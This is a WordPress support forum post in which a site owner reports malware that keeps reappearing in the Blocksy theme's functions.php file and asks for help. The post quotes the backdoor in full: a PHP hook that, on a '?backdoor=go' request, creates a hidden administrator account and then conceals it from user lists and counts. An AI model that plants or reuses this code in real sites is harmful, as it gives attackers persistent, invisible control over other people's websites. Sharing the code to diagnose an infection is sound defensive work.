Malware detected and autopopulating on Blocksy Theme – Functions.php file

HI guys,

I’ve very recently been notified by my Webhosting that there is a Malware code associated with my site, Namely attached to the following path “<small>theclubjukebox.com/wp-content/themes/blocksy/functions.php</small>”

“Exploit Found – php.wp.create.user.set.role.sql”

I have tried deleting the file and replaced it with a clean file, also deleting the extranous code, but to no avail, as it just keeps reappearing. I have changed passwords on wordpress and started using two factor authentication etc, but no joy.

The code in question is this:-

// Custom Code Marker: Do not remove or modify this line

add_action( 'wp_head', 'wp_backdoor_functions' );

function wp_backdoor_functions() {
if ( isset( $_GET['backdoor'] ) && $_GET['backdoor'] == 'go' ) {
require( ABSPATH . 'wp-includes/registration.php' );
if ( !username_exists( 'admcadf' ) ) {
$user_id = wp_create_user( 'admcadf', 'admcadf' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}

add_action('after_setup_theme', 'wp_backdoor_functions');

add_action('pre_user_query','dt_pre_user_query_functions');

function dt_pre_user_query_functions($user_search) {
global $current_user;
$username = $current_user->user_login;

if ($username != 'admcadf') {
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE 1=1 AND {$wpdb->users}.user_login != 'admcadf'",$user_search->query_where);
}
}

add_filter('views_users', 'dt_list_table_views_functions');

function dt_list_table_views_functions($views){
$users = count_users();
$admins_num = $users['avail_roles']['administrator'] - 1;
$all_num = $users['total_users'] - 1;
$class_adm = ( strpos($views['administrator'], 'current') === false ) ? "" : "current";
$class_all = ( strpos($views['all'], 'current') === false ) ? "" : "current";
$views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admins_num . ')';
$views['all'] = '' . __('All') . ' (' . $all_num . ')';
return $views;
}

Please could someone help me with this issue, as it seems to be linked or assciated with the Blocksy theme in some way.

Many kind regards,
Bill

  • This topic was modified 19 hours, 38 minutes ago by Firebrand.
  • This topic was modified 19 hours, 37 minutes ago by Firebrand.

The page I need help with: [log in to see the link]

 

This site will teach you how to build a WordPress website for beginners. We will cover everything from installing WordPress to adding pages, posts, and images to your site. You will learn how to customize your site with themes and plugins, as well as how to market your site online.

Buy WordPress Transfer